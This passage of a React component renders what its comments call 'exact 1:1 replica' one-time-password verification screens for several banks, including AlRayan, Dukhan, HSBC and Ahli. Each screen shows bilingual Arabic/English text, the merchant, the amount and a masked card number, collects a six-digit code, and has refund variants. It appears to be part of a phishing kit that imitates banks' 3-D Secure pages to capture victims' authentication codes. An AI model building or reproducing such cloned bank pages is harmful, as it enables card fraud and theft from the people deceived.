                  disabled={code.length !== 6 || isDuplicate || isSubmitting}
                  style={{
                    display: 'flex',
                    height: '2rem',
                    width: '7rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    backgroundColor: '#006838',
                    fontSize: '0.75rem',
                    fontWeight: 'bold',
                    color: '#ffffff',
                    border: 'none',
                    borderRadius: '0.25rem',
                    cursor: 'pointer'
                  }}
                >
                  {isSubmitting ? '...' : (isRefund ? (isRtl ? 'استرداد' : 'Refund') : (isRtl ? 'إرسال' : 'Submit'))}
                </button>
              </div>
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── 6. ALRAYAN VARIANT (Exact 1:1 replica of alRayan.jsx) ─────────
  if (bank.type === 'alrayan') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div style={{ display: 'flex', alignItems: 'flex-start', justifyContent: 'space-between' }}>
              <img src={bank.logo} alt="" style={{ height: '2.25rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '3rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #a3a3a3', marginTop: '0.75rem' }} />

            <h1 style={{ marginTop: '0.75rem', fontSize: '0.875rem', fontWeight: 500, lineHeight: '1.25rem' }}>
              {isRefund ? (isRtl ? 'المصادقة على استرداد الأموال' : 'Secure your refund transaction') : (isRtl ? 'تأمين معاملتك الإلكترونية' : 'Secure your e-commerce transaction')}
            </h1>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.25rem' }}>
              {isRtl ? 'تم إرسال رمز التحقق لمرة واحدة إلى هاتفك المسجل لدى مصرف الريان.' : 'OTP has been sent to your mobile number/email address registered with AlRayan Bank.'}
            </p>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.25rem' }}>
              {isRtl ? `أنت تدفع لـ ${merchant} مبلغ ${currency} ${amount} بالبطاقة ************${last4} في ${formattedDate}` : `You are paying ${merchant} the amount of ${currency} ${amount} using card ************${last4} on ${formattedDate}`}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '1.5rem auto 0' }}>
              <label htmlFor="alrayan-code" style={{ display: 'block', textAlign: 'center', fontSize: '0.875rem', color: '#8180A3' }}>
                {isRtl ? 'رمز التحقق' : 'Verification Code'}
              </label>

              <input
                id="alrayan-code"
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={6}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                dir="ltr"
                style={{
                  marginTop: '0.25rem',
                  height: '3rem',
                  width: '100%',
                  borderRadius: '0.25rem',
                  border: '1px solid #8180A3',
                  backgroundColor: '#ffffff',
                  padding: '0 1rem',
                  textAlign: 'center',
                  fontSize: '1.125rem',
                  letterSpacing: '0.25em',
                  color: '#000000',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length !== 6 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.5rem',
                  display: 'flex',
                  height: '2.75rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  backgroundColor: '#183AB0',
                  fontSize: '0.875rem',
                  fontWeight: 'bold',
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '0.25rem',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? (isRtl ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isRtl ? 'إرسال' : 'Submit'))}
              </button>

              <div style={{ marginTop: '0.75rem', textAlign: 'center' }}>
                <button
                  type="button"
                  onClick={handleResend}
                  style={{ fontSize: '0.75rem', fontWeight: 'bold', color: '#183AB0', background: 'none', border: 'none', cursor: 'pointer' }}
                >
                  {isRtl ? 'اضغط هنا لاستلام رمز آخر' : 'CLICK HERE TO RECEIVE ANOTHER CODE'}
                </button>
              </div>

              {resendSuccess && (
                <div className="qb-resend-alert" role="status">
                  ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
                </div>
              )}
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── 7. DUKHAN VARIANT (Exact 1:1 replica of Dukhan.jsx) ─────────
  if (bank.type === 'dukhan') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div style={{ display: 'flex', alignItems: 'flex-start', justifyContent: 'space-between' }}>
              <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '3rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #a3a3a3', marginTop: '0.75rem' }} />

            <h1 style={{ marginTop: '0.75rem', fontSize: '0.875rem', fontWeight: 'bold' }}>
              {isRefund ? (isRtl ? 'المصادقة على استرداد الأموال' : 'Refund authentication') : (isRtl ? 'مصادقة الشراء' : 'Purchase authentication')}
            </h1>

            <p style={{ marginTop: '0.5rem', fontSize: '0.75rem' }}>
              {isRtl ? 'لقد أرسلنا إليك للتو رمز تحقق عبر رسالة نصية قصيرة' : 'We just sent you a verification code by Text'}
            </p>

            <p style={{ marginTop: '0.75rem', fontSize: '0.75rem' }}>
              {isRtl ? `أنت تفوض دفعة لـ ${merchant} بمبلغ ${currency} ${amount} في ${formattedDate} ببطاقتك ************${last4}.` : `You are authorizing a payment to ${merchant} for ${currency} ${amount} on ${formattedDate} with your card ************${last4}.`}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '1.5rem auto 0' }}>
              <label htmlFor="dukhan-code" style={{ display: 'block', textAlign: 'center', fontSize: '0.875rem', color: '#8180A3' }}>
                {isRtl ? 'رمز التحقق' : 'Verification Code'}
              </label>

              <input
                id="dukhan-code"
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={6}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                dir="ltr"
                style={{
                  marginTop: '0.25rem',
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '0.25rem',
                  border: '1px solid #8180A3',
                  backgroundColor: '#ffffff',
                  padding: '0 1rem',
                  textAlign: 'center',
                  fontSize: '1.125rem',
                  letterSpacing: '0.25em',
                  color: '#000000',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length !== 6 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.5rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  backgroundColor: '#183AB0',
                  fontSize: '0.875rem',
                  fontWeight: 'bold',
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '0.25rem',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? (isRtl ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isRtl ? 'إرسال' : 'SUBMIT'))}
              </button>

              <div style={{ marginTop: '0.75rem', textAlign: 'center' }}>
                <button
                  type="button"
                  onClick={handleResend}
                  style={{ fontSize: '0.75rem', fontWeight: 'bold', color: '#183AB0', background: 'none', border: 'none', cursor: 'pointer' }}
                >
                  {isRtl ? 'اضغط هنا لاستلام رمز آخر' : 'CLICK HERE TO RECEIVE ANOTHER CODE'}
                </button>
              </div>

              {resendSuccess && (
                <div className="qb-resend-alert" role="status">
                  ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
                </div>
              )}
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── 8. HSBC VARIANT (Exact 1:1 replica of HSBC.jsx) ─────────────
  if (bank.type === 'hsbc') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div style={{ borderTop: '1px solid #d4d4d4', margin: '0.25rem 0' }} />

            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', padding: '0.5rem 0' }}>
              <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #d4d4d4' }} />

            <h1 style={{ marginTop: '0.75rem', textAlign: 'center', fontSize: '1.125rem', fontWeight: 'bold', color: '#374151' }}>
              {isRefund ? (isRtl ? 'المصادقة على استرداد الأموال' : 'Refund Authentication') : (isRtl ? 'مصادقة الدفع' : 'Payment Authentication')}
            </h1>

            <p style={{ marginTop: '0.75rem', textAlign: 'center', fontSize: '0.875rem', lineHeight: '1.25rem', color: '#374151' }}>
              {isRtl ? 'لقد أرسلنا إليك رسالة نصية تحتوي على رمز آمن إلى رقم هاتفك المسجل.' : 'We have sent you a text message with a secure code to your registered mobile number.'}
            </p>

            <p style={{ marginTop: '0.5rem', textAlign: 'center', fontSize: '0.875rem', lineHeight: '1.25rem', color: '#374151' }}>
              {isRtl ? `مرحباً، تتطلب هذه المعاملة التحقق من هويتك باستخدام رمز آمن. أنت تدفع لـ ${merchant} مبلغ ${currency} ${amount} في ${formattedDate} باستخدام رقم البطاقة ************${last4}.` : `Hi, this transaction requires you to authenticate yourself by using a secure code. You are paying merchant ${merchant} the amount of ${currency} ${amount} on ${formattedDate} using card number ************${last4}.`}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '0.75rem auto 0' }}>
              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={6}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                placeholder={isRtl ? 'يرجى إدخال الرمز الآمن' : 'Please enter the secure code.'}
                dir="ltr"
                style={{
                  height: '2.25rem',
                  width: '100%',
                  borderRadius: '0.5rem',
                  border: '1px solid #9ca3af',
                  backgroundColor: '#ffffff',
                  padding: '0 0.75rem',
                  textAlign: 'center',
                  fontSize: '0.875rem',
                  letterSpacing: '0.1em',
                  color: '#374151',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length !== 6 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '1.5rem',
                  display: 'flex',
                  height: '3rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.5rem',
                  backgroundColor: '#47749E',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? (isRtl ? 'تأكيد الاسترداد' : 'Confirm Refund') : (isRtl ? 'تحقق' : 'VERIFY'))}
              </button>

              <button
                type="button"
                onClick={handleResend}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '3rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.5rem',
                  border: '1px solid #3b82f6',
                  backgroundColor: '#ffffff',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#47749E',
                  cursor: 'pointer'
                }}
              >
                {isRtl ? 'إعادة إرسال الرمز' : 'Resend Code'}
              </button>

              {resendSuccess && (
                <div className="qb-resend-alert" role="status">
                  ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
                </div>
              )}
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── 9. AHLI VARIANT (Exact 1:1 replica of Ahli.jsx - default) ───
  return (
    <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
      <div className="qb-modal">
        <main className="qb-body">
          <div style={{ display: 'flex', alignItems: 'flex-start', justifyContent: 'space-between' }}>
            <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            <img src={schemeLogo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
          </div>

          <h1 style={{ marginTop: '1.5rem', fontSize: '0.75rem', fontWeight: 800 }}>
            {isRefund ? (isRtl ? 'المصادقة على استرداد الأموال' : 'Authenticate your Refund') : (isRtl ? 'مصادقة الشراء' : 'Authenticate your Purchase')}
          </h1>

          <p style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.25rem' }}>
            {isRtl ? 'لقد أرسلنا إليك للتو رمز تحقق لمرة واحدة' : 'We just sent you a One Time Password'}
          </p>

          <p style={{ marginTop: '0.75rem', fontSize: '0.75rem' }}>
            {isRtl ? `أنت تفوض دفعة لـ ${merchant} بمبلغ ${currency} ${amount} في ${formattedDate} ببطاقتك ************${last4}.` : `You are authorizing a payment to ${merchant} for ${currency} ${amount} on ${formattedDate} with your card ************${last4}.`}
          </p>

          <h2 style={{ marginTop: '1.5rem', fontSize: '0.75rem', fontWeight: 'bold', color: '#525252' }}>
            {isRtl ? 'تفاصيل المعاملة' : 'Transaction Details'}
          </h2>

          <div style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.25rem' }}>
            <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
              <span style={{ fontWeight: 800 }}>{isRtl ? 'المتجر:' : 'Merchant:'}</span>
              <span>{merchant}</span>
            </div>
            <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
              <span style={{ fontWeight: 800 }}>{isRtl ? 'مبلغ المعاملة:' : 'Transaction Amount:'}</span>
              <span dir="ltr">{currency} {amount}</span>
            </div>
            <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
              <span style={{ fontWeight: 800 }}>{isRtl ? 'رقم البطاقة:' : 'Card Number:'}</span>
              <span dir="ltr">************{last4}</span>
            </div>
          </div>

          {renderError()}

          <form onSubmit={handleSubmit} style={{ marginTop: '1rem' }}>
            <label style={{ display: 'block', fontSize: '0.75rem', fontWeight: 800, marginBottom: '0.25rem' }}>
              {isRtl ? 'أدخل الرمز:' : 'Enter Code:'}
            </label>

            <input
              type="text"
              inputMode="numeric"
              pattern="[0-9]*"
              maxLength={6}
              autoComplete="off"
              value={code}
              onChange={handleCodeChange}
              autoFocus
              dir="ltr"
              style={{
                height: '1.75rem',
                width: '100%',
                borderRadius: '0.25rem',
                border: '1px solid #d4d4d4',
                backgroundColor: '#ffffff',
                padding: '0 0.5rem',
                fontSize: '0.75rem',
                outline: 'none',
                boxSizing: 'border-box'
              }}
            />

            <div style={{ marginTop: '0.75rem', textAlign: 'center' }}>
              <button
                type="button"
                onClick={handleResend}
                style={{ fontSize: '0.75rem', fontWeight: 600, textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer', color: '#000000' }}
              >
                {isRtl ? 'اضغط هنا لاستلام رمز آخر' : 'Click here to receive another code'}
              </button>
            </div>

            {resendSuccess && (
              <div className="qb-resend-alert" role="status">
                ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
              </div>
            )}

            <div style={{ marginTop: '0.75rem', display: 'flex', justifyContent: 'center' }}>
              <button
                type="submit"
                disabled={code.length !== 6 || isDuplicate || isSubmitting}
                style={{
                  display: 'flex',
                  height: '2rem',
                  width: '7rem',
                  alignItems: 'center',
                  justifyContent: 'center',
                  backgroundColor: '#0B3D91',
                  fontSize: '0.75rem',
                  fontWeight: 'bold',
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '0.25rem',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? (isRtl ? 'استرداد' : 'Refund') : (isRtl ? 'إرسال' : 'Submit'))}
              </button>
            </div>
          </form>
        </main>
      </div>
    </div>
  );
}

